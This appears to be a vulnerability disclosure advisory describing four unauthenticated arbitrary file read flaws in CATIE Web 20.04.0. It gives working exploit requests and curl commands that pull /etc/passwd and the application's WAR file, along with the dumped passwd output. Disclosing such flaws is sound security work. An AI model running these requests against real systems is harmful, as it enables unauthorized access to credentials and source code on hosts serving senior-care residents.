CATIE WEB ADVISORY SUMMARY
The following document describes identified vulnerabilities in the CATIE Web application version 20.04.0.
Product Vendor
Status Solutions
Product Description
According to the official product documentation, CATIE Web is “a communication, self-service and resident engagement software that helps seniors connect with their community” while also “keeping staff informed about residents’ needs on a daily basis.” The project’s official website is https://www.statussolutions.com/resident-engagement-catie. The latest version of the application is 21.06.0.
Vulnerabilities List
Four local file disclosure vulnerabilities were identified within the CATIE Web application. These vulnerabilities are described in the following sections.
Affected Version
Version 20.04.0
Summary of Findings
CATIE Web version 20.04 is vulnerable to four local file disclosure vulnerabilities, which enable an unauthenticated remote attacker to read arbitrary files via four separate application endpoints.
High-Risk Impact
An attacker could leverage these vulnerabilities to read or download any file on the host, as the vulnerable service has root privileges. Accessible files may include application source code, password hashes, and cleartext secrets in configuration files. With this level of access, an attacker could likely gain access to the application and eventually compromise the host.
Solution
As of this writing, the vulnerabilities described have not been remediated.
VULNERABILITIES
LOCAL FILE DISCLOSURE
The CATIE Web application was affected by four local file disclosure vulnerabilities via the application’s endpoints. These vulnerabilities allowed all files to be read on the file system, as the vulnerable service was running with root permissions, and could be exploited remotely without authentication.
Vulnerability details
CVE ID |
Security Risk |
Impact |
Access Vector |
| N/A | High | Information Disclosure | Remote |
The assessment team used the /catie/MultiPartUtilityServlet API endpoint to craft a request and successfully retrieved the /etc/passwd file, as shown below:
Request
GET /catie/MultiPartUtilityServlet?file=/passwd&dir=/etc HTTP/1.1
Host: [REDACTED]
...omitted for brevity...
Response
HTTP/1.1 200 200
...omitted for brevity...
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
Demo:x:500:500::/home/Demo:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
support:x:501:501::/home/support:/bin/bash
ladmin:x:502:502::/home/ladmin:/bin/bash
The vulnerable service was running as root and the team identified the location of the catie.war web application deployment file via the root user’s .bash_history file, downloaded it using the arbitrary file read, and extracted the file to access the source code:
$ curl -sk 'https://[REDACTED]/catie/MultiPartUtilityServlet?file=catie.war&dir=/home/apache-tomcat/webapps/' --output catie.war
$ unzip catie.war
...omitted for brevity...
$ ls
admin appadmin catie.war device global META-INF sara WEB-INFThe team performed a cursory code review of the application and identified three additional arbitrary file read vulnerabilities at the following locations:
$ curl -sk 'https://[REDACTED]/catie/ImageGrabberServlet?imageName=/passwd&imageDir=/etc'
$ curl -sk 'https://[REDACTED]/catie/AudioStream?file=/etc/passwd'
$ curl -sk 'https://[REDACTED]/catie/device/carousel/tv/Filewriter?filename=/etc/passwd'
Credits
- Nate Robb, Adversarial Operator, Bishop Fox ([email protected])
- Dan Ritter, Adversarial Operator, Bishop Fox ([email protected])
Timeline
- 04/12/2021: Initial vulnerability discovery
- 04/28/2021: Initial attempted contact with vendor via email, no response
- 4/30/2021: Second attempted contact with vendor via email, no response
- 5/06/2021: Messaged Status Solutions Facebook account to inquire about a security contact for disclosure, no response
- 5/27/2021: Called number listed on Status Solutions website (866-846-7272), received voice mailbox
- 6/02/2021: Emailed technical manager in charge of CATIE Web directly, no response
- 6/09/2021: Sent second email to technical manager in charge of CATIE Web directly, no response
- 8/25/2021: Spoke to lead developer via phone, sent PoC details in email
- 12/02/2021: Advisory published
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.
